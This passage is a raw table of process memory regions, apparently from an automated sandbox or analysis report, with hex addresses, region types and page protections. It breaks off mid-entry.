22BF7C47000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB30000
|
trusted library allocation
|
page read and write
|
||
1AC65000
|
heap
|
page read and write
|
||
7FF887A9D000
|
trusted library allocation
|
page execute and read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
22BF7AA3000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF7C01000
|
heap
|
page read and write
|
||
1B5000
|
heap
|
page read and write
|
||
12DB8000
|
trusted library allocation
|
page read and write
|
||
1AC12000
|
heap
|
page read and write
|
||
7FF887C30000
|
trusted library allocation
|
page read and write
|
||
22BF7C08000
|
heap
|
page read and write
|
||
22BF58A8000
|
heap
|
page read and write
|
||
2A5A900F000
|
unkown
|
page execute and read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
D2E000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
59CB000
|
heap
|
page read and write
|
||
22BF7C40000
|
heap
|
page read and write
|
||
7FF887ED0000
|
trusted library allocation
|
page read and write
|
||
27474CF0000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
7FF887E50000
|
trusted library allocation
|
page read and write
|
||
2745C290000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
23D22ADE000
|
heap
|
page read and write
|
||
2745D73E000
|
trusted library allocation
|
page read and write
|
||
7DF406980000
|
trusted library allocation
|
page execute and read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1BB30000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AEC0000
|
trusted library allocation
|
page read and write
|
||
23D229A9000
|
heap
|
page read and write
|
||
22BF7C58000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
7FF887D50000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
23D229CA000
|
heap
|
page read and write
|
||
7FF887BD4000
|
trusted library allocation
|
page read and write
|
||
1BB40000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
2BD0000
|
heap
|
page read and write
|
||
1CB4947C000
|
heap
|
page read and write
|
||
24A2E344000
|
heap
|
page read and write
|
||
22BF85F3000
|
heap
|
page read and write
|
||
2A5A8FB1000
|
unkown
|
page execute read
|
||
22BF86FA000
|
heap
|
page read and write
|
||
2810000
|
heap
|
page read and write
|
||
1ABF0000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1ADF1000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page readonly
|
||
1AED0000
|
trusted library allocation
|
page read and write
|
||
22BF85C8000
|
heap
|
page read and write
|
||
7FF887C02000
|
trusted library allocation
|
page read and write
|
||
2276000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
1AA63000
|
trusted library allocation
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
1AC0B000
|
stack
|
page read and write
|
||
7FF887DC0000
|
trusted library allocation
|
page read and write
|
||
1BBA0000
|
trusted library allocation
|
page read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
1B9B0000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
7FF887A53000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887C70000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF7AAB000
|
heap
|
page read and write
|
||
22BF7C38000
|
heap
|
page read and write
|
||
2821000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF8524000
|
heap
|
page read and write
|
||
23D20E00000
|
direct allocation
|
page execute and read and write
|
||
1EAE1FE000
|
stack
|
page read and write
|
||
23D20E2B000
|
heap
|
page read and write
|
||
7FF887E40000
|
trusted library allocation
|
page execute and read and write
|
||
22BF7C38000
|
heap
|
page read and write
|
||
22BF858C000
|
heap
|
page read and write
|
||
1CB4946E000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
1B780000
|
trusted library allocation
|
page read and write
|
||
22BF7C72000
|
heap
|
page read and write
|
||
22BF8516000
|
heap
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
1B54B000
|
stack
|
page read and write
|
||
22BF8235000
|
unkown
|
page read and write
|
||
22BF58A8000
|
heap
|
page read and write
|
||
26A2000
|
trusted library allocation
|
page read and write
|
||
22BF7A95000
|
heap
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
1B001ECE000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
7FF887E20000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
22BF8518000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF79FA000
|
heap
|
page read and write
|
||
7FF887D50000
|
trusted library allocation
|
page read and write
|
||
1AA63000
|
trusted library allocation
|
page read and write
|
||
44D287E000
|
stack
|
page read and write
|
||
7FF887B70000
|
trusted library allocation
|
page execute and read and write
|
||
22BF79FA000
|
heap
|
page read and write
|
||
22BF7AA8000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1B8E0000
|
trusted library allocation
|
page read and write
|
||
A708743000
|
stack
|
page read and write
|
||
22BF8036000
|
unkown
|
page read and write
|
||
1BACE000
|
trusted library allocation
|
page read and write
|
||
1B9A0000
|
trusted library allocation
|
page read and write
|
||
D34000
|
heap
|
page read and write
|
||
1AB67000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
2B3E000
|
heap
|
page read and write
|
||
7FF887CD0000
|
trusted library allocation
|
page read and write
|
||
1B818000
|
trusted library allocation
|
page read and write
|
||
1BB50000
|
trusted library allocation
|
page read and write
|
||
1BB80000
|
trusted library allocation
|
page read and write
|
||
1B780000
|
trusted library allocation
|
page read and write
|
||
22BF58B0000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1B4B0000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
7FF887CD0000
|
trusted library allocation
|
page read and write
|
||
5946000
|
heap
|
page read and write
|
||
1C6F4000
|
unkown
|
page read and write
|
||
1CB4C890000
|
trusted library allocation
|
page read and write
|
||
7FF887C80000
|
trusted library allocation
|
page read and write
|
||
8AD000
|
unkown
|
page readonly
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7A9A000
|
heap
|
page read and write
|
||
7FF887D00000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1B010381000
|
trusted library allocation
|
page read and write
|
||
7FF887B66000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887AAD000
|
trusted library allocation
|
page execute and read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
2408000
|
trusted library allocation
|
page read and write
|
||
1AC9E000
|
heap
|
page read and write
|
||
884000
|
unkown
|
page read and write
|
||
2490000
|
heap
|
page read and write
|
||
1AA73000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
23D229B1000
|
heap
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1E90000
|
trusted library section
|
page read and write
|
||
7FF8DEFB0000
|
unkown
|
page readonly
|
||
7DF431871000
|
unkown
|
page execute read
|
||
22BF7AB7000
|
heap
|
page read and write
|
||
899000
|
unkown
|
page write copy
|
||
22BF859C000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7AAB000
|
heap
|
page read and write
|
||
D2C000
|
heap
|
page read and write
|
||
2622000
|
heap
|
page read and write
|
||
7FF887A7D000
|
trusted library allocation
|
page execute and read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
7FF887D10000
|
trusted library allocation
|
page read and write
|
||
7FF887C90000
|
trusted library allocation
|
page read and write
|
||
7FF887C90000
|
trusted library allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
1B018AE2000
|
heap
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
7FF887A5D000
|
trusted library allocation
|
page execute and read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
A48963E000
|
stack
|
page read and write
|
||
27474821000
|
heap
|
page read and write
|
||
1B600000
|
trusted library allocation
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
7FF717700000
|
unkown
|
page readonly
|
||
7FF887C20000
|
trusted library allocation
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1CB49640000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
44D26FE000
|
stack
|
page read and write
|
||
311F000
|
stack
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
23EC000
|
trusted library allocation
|
page read and write
|
||
1B470000
|
trusted library allocation
|
page read and write
|
||
22BF850F000
|
heap
|
page read and write
|
||
22BF7C09000
|
heap
|
page read and write
|
||
1ADAE000
|
heap
|
page read and write
|
||
44D2AB7000
|
stack
|
page read and write
|
||
2A5A9080000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1B783000
|
trusted library allocation
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
7FF887A64000
|
trusted library allocation
|
page read and write
|
||
1B4F0000
|
trusted library allocation
|
page read and write
|
||
7FF887A50000
|
trusted library allocation
|
page read and write
|
||
7FF887CA0000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1E879E30000
|
heap
|
page readonly
|
||
1AAF0000
|
trusted library allocation
|
page read and write
|
||
22BF7B9C000
|
heap
|
page read and write
|
||
1B790000
|
trusted library allocation
|
page read and write
|
||
5D2F000
|
stack
|
page read and write
|
||
1ADD0000
|
heap
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
1B810000
|
trusted library allocation
|
page read and write
|
||
7FF887D8C000
|
trusted library allocation
|
page read and write
|
||
A48943E000
|
stack
|
page read and write
|
||
27474C32000
|
heap
|
page read and write
|
||
22BF79F9000
|
heap
|
page read and write
|
||
1AA63000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF859B000
|
heap
|
page read and write
|
||
22BF58BD000
|
heap
|
page read and write
|
||
1AA80000
|
trusted library allocation
|
page read and write
|
||
22BF8520000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
5AB2BFF000
|
stack
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
2B50000
|
heap
|
page read and write
|
||
2BA0000
|
trusted library allocation
|
page read and write
|
||
1AB00000
|
trusted library allocation
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
22BF7C28000
|
heap
|
page read and write
|
||
23D20ECC000
|
heap
|
page read and write
|
||
269F000
|
trusted library allocation
|
page read and write
|
||
7FF887B30000
|
trusted library allocation
|
page execute and read and write
|
||
C6B000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
2FF3000
|
trusted library allocation
|
page read and write
|
||
1CB4B0D0000
|
heap
|
page execute and read and write
|
||
22BF7C38000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1B530000
|
trusted library allocation
|
page read and write
|
||
7FF887E00000
|
trusted library allocation
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
2746C411000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
1B018A90000
|
heap
|
page read and write
|
||
22BF7AAB000
|
heap
|
page read and write
|
||
22BF85DF000
|
heap
|
page read and write
|
||
1B9C0000
|
trusted library allocation
|
page read and write
|
||
2B1D000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7A40000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
7FF887E66000
|
trusted library allocation
|
page read and write
|
||
1AC90000
|
trusted library allocation
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
7FF887A8D000
|
trusted library allocation
|
page execute and read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
2A5A9395000
|
heap
|
page read and write
|
||
22BF859B000
|
heap
|
page read and write
|
||
1AADB0C0000
|
heap
|
page read and write
|
||
44D277E000
|
stack
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1B770000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
5AB29FC000
|
stack
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
2693000
|
trusted library allocation
|
page read and write
|
||
22BF7AAB000
|
heap
|
page read and write
|
||
2745DE75000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1BAC0000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
24A2E653000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
1AC9E000
|
heap
|
page read and write
|
||
7FF887D10000
|
trusted library allocation
|
page read and write
|
||
7FF887E70000
|
trusted library allocation
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
1CB4C25F000
|
trusted library allocation
|
page read and write
|
||
1AB30000
|
trusted library allocation
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1AF11000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
7FF887CD0000
|
trusted library allocation
|
page read and write
|
||
2746C6FD000
|
trusted library allocation
|
page read and write
|
||
22BF7AB8000
|
heap
|
page read and write
|
||
22BF85DC000
|
heap
|
page read and write
|
||
23D22ADE000
|
heap
|
page read and write
|
||
22BF7C4F000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
D35000
|
heap
|
page read and write
|
||
7FF887BDA000
|
trusted library allocation
|
page read and write
|
||
7FF7178DB000
|
unkown
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
2745AB95000
|
heap
|
page read and write
|
||
24A2C950000
|
heap
|
page read and write
|
||
28BA000
|
heap
|
page read and write
|
||
2380000
|
heap
|
page execute and read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1BA75000
|
trusted library allocation
|
page read and write
|
||
1AED0000
|
trusted library allocation
|
page read and write
|
||
1CB634DD000
|
heap
|
page read and write
|
||
59D2000
|
heap
|
page read and write
|
||
1B018800000
|
heap
|
page read and write
|
||
22BF7A28000
|
heap
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
A708AFF000
|
stack
|
page read and write
|
||
2745DE16000
|
trusted library allocation
|
page read and write
|
||
1B55F000
|
trusted library allocation
|
page read and write
|
||
A48917E000
|
stack
|
page read and write
|
||
1CB636B9000
|
heap
|
page read and write
|
||
1CB49683000
|
trusted library allocation
|
page read and write
|
||
2729000
|
trusted library allocation
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
1B4A0000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
23D20E00000
|
direct allocation
|
page execute and read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1A390000
|
trusted library allocation
|
page read and write
|
||
22BF8518000
|
heap
|
page read and write
|
||
7FF887DF0000
|
trusted library allocation
|
page read and write
|
||
1B65E000
|
stack
|
page read and write
|
||
A708D79000
|
stack
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF58B9000
|
heap
|
page read and write
|
||
1AE40000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7AAB000
|
heap
|
page read and write
|
||
1B470000
|
trusted library allocation
|
page read and write
|
||
7FF887D82000
|
trusted library allocation
|
page read and write
|
||
7FF782885000
|
direct allocation
|
page execute and read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
2DB0000
|
heap
|
page execute and read and write
|
||
2745CF8D000
|
trusted library allocation
|
page read and write
|
||
1BAD0000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B550000
|
trusted library section
|
page read and write
|
||
1AC11000
|
heap
|
page read and write
|
||
1AE90000
|
trusted library allocation
|
page read and write
|
||
1B58C000
|
heap
|
page execute and read and write
|
||
23D22F25000
|
heap
|
page read and write
|
||
7FF717701000
|
unkown
|
page execute read
|
||
22BF7E12000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
CB8000
|
heap
|
page read and write
|
||
23D229B0000
|
heap
|
page read and write
|
||
22BF851D000
|
heap
|
page read and write
|
||
2BDA000
|
heap
|
page read and write
|
||
D2E000
|
heap
|
page read and write
|
||
1B9F0000
|
trusted library allocation
|
page read and write
|
||
7FF7177BB000
|
unkown
|
page write copy
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
A488DE2000
|
stack
|
page read and write
|
||
22BF7E17000
|
heap
|
page read and write
|
||
1AAC0000
|
trusted library allocation
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
1CB4D0EA000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
2A13000
|
heap
|
page read and write
|
||
22BF7C70000
|
heap
|
page read and write
|
||
1B018C2C000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B7D0000
|
trusted library allocation
|
page read and write
|
||
7FF7823F0000
|
direct allocation
|
page execute and read and write
|
||
1B720000
|
trusted library allocation
|
page read and write
|
||
274747C9000
|
heap
|
page read and write
|
||
22BF85F3000
|
heap
|
page read and write
|
||
1B8D0000
|
trusted library allocation
|
page read and write
|
||
7FF887D30000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1B56C000
|
trusted library allocation
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
2963000
|
heap
|
page read and write
|
||
2F6C000
|
trusted library allocation
|
page read and write
|
||
7FF887EB0000
|
trusted library allocation
|
page read and write
|
||
7FF887B0C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887BD0000
|
trusted library allocation
|
page read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
1AB50000
|
trusted library allocation
|
page read and write
|
||
1AE8E000
|
stack
|
page read and write
|
||
1BA63000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
2B33000
|
heap
|
page read and write
|
||
7FF887C00000
|
trusted library allocation
|
page read and write
|
||
1EAE0FE000
|
stack
|
page read and write
|
||
7FF887CC0000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
21C0000
|
heap
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
7FF887B56000
|
trusted library allocation
|
page execute and read and write
|
||
1B9D0000
|
trusted library allocation
|
page read and write
|
||
22BF7A40000
|
heap
|
page read and write
|
||
22BF7AA8000
|
heap
|
page read and write
|
||
1CB4D07A000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1CB496C0000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
22BF8524000
|
heap
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
1B469000
|
trusted library allocation
|
page read and write
|
||
4AA0000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7C70000
|
heap
|
page read and write
|
||
7FF887CC0000
|
trusted library allocation
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
A4891F9000
|
stack
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
2078000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
7FF887A94000
|
trusted library allocation
|
page read and write
|
||
1B07FE00000
|
heap
|
page read and write
|
||
22BF7A41000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AA83000
|
trusted library allocation
|
page read and write
|
||
89D000
|
unkown
|
page write copy
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7C3F000
|
heap
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1B7D0000
|
trusted library allocation
|
page read and write
|
||
22BF85F3000
|
heap
|
page read and write
|
||
1E879DE0000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1B001EBB000
|
trusted library allocation
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
7FF8DF029000
|
unkown
|
page read and write
|
||
1C8D6000
|
unkown
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
2A29000
|
heap
|
page read and write
|
||
22BF7AB3000
|
heap
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
A708CFE000
|
stack
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1B640000
|
trusted library allocation
|
page read and write
|
||
22BF7AA4000
|
heap
|
page read and write
|
||
22BF85D5000
|
heap
|
page read and write
|
||
1AB73000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1BB10000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
1B018C43000
|
heap
|
page read and write
|
||
7FF887CA0000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
240A000
|
trusted library allocation
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
1AC30000
|
trusted library allocation
|
page read and write
|
||
1ACF0000
|
trusted library allocation
|
page read and write
|
||
23FE000
|
trusted library allocation
|
page read and write
|
||
1CB49680000
|
trusted library allocation
|
page read and write
|
||
22BF7C71000
|
heap
|
page read and write
|
||
1CB4C7A5000
|
trusted library allocation
|
page read and write
|
||
1BA30000
|
trusted library allocation
|
page read and write
|
||
1AB67000
|
trusted library allocation
|
page read and write
|
||
7FF887EC0000
|
trusted library allocation
|
page read and write
|
||
1EE0000
|
heap
|
page read and write
|
||
1B800000
|
trusted library allocation
|
page read and write
|
||
2B58000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF8519000
|
heap
|
page read and write
|
||
1AF00000
|
trusted library allocation
|
page read and write
|
||
90000
|
heap
|
page read and write
|
||
7FF887D00000
|
trusted library allocation
|
page read and write
|
||
7FF887AF0000
|
trusted library allocation
|
page read and write
|
||
7FF887D20000
|
trusted library allocation
|
page read and write
|
||
1CB4C7A9000
|
trusted library allocation
|
page read and write
|
||
22BF8518000
|
heap
|
page read and write
|
||
A4897BB000
|
stack
|
page read and write
|
||
A48A28B000
|
stack
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
44D380E000
|
stack
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1BAE0000
|
trusted library allocation
|
page read and write
|
||
22BF856C000
|
heap
|
page read and write
|
||
2745D736000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
C21000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
7FF7178DF000
|
unkown
|
page readonly
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
1B07E2AD000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF5896000
|
heap
|
page read and write
|
||
7FF887A8D000
|
trusted library allocation
|
page execute and read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
44D2A3F000
|
stack
|
page read and write
|
||
8AD000
|
unkown
|
page readonly
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1B6DA000
|
stack
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
7DF406970000
|
trusted library allocation
|
page execute and read and write
|
||
1CB4C8E3000
|
trusted library allocation
|
page read and write
|
||
8A9000
|
unkown
|
page readonly
|
||
7FF887CB0000
|
trusted library allocation
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
1EF0000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
2745C210000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1AA67000
|
trusted library allocation
|
page read and write
|
||
2274000
|
heap
|
page read and write
|
||
22BF7AB7000
|
heap
|
page read and write
|
||
7DF431886000
|
unkown
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1B7C0000
|
trusted library allocation
|
page read and write
|
||
22BF7C08000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85D3000
|
heap
|
page read and write
|
||
10E0000
|
heap
|
page read and write
|
||
5959000
|
heap
|
page read and write
|
||
1CB6348E000
|
heap
|
page read and write
|
||
24A2E343000
|
heap
|
page read and write
|
||
1B520000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1BB00000
|
trusted library allocation
|
page read and write
|
||
1B5A0000
|
trusted library allocation
|
page read and write
|
||
89D000
|
unkown
|
page write copy
|
||
1B590000
|
trusted library allocation
|
page read and write
|
||
1BBD0000
|
trusted library allocation
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
7FF887E60000
|
trusted library allocation
|
page read and write
|
||
1B980000
|
trusted library allocation
|
page read and write
|
||
D34000
|
heap
|
page read and write
|
||
22BF7A0A000
|
heap
|
page read and write
|
||
1B591000
|
heap
|
page read and write
|
||
1AB65000
|
trusted library allocation
|
page read and write
|
||
1BC60000
|
trusted library allocation
|
page read and write
|
||
7FF887C30000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887C10000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887C30000
|
trusted library allocation
|
page execute and read and write
|
||
22BF85D3000
|
heap
|
page read and write
|
||
1EAE17D000
|
stack
|
page read and write
|
||
1B000150000
|
heap
|
page read and write
|
||
1B48D000
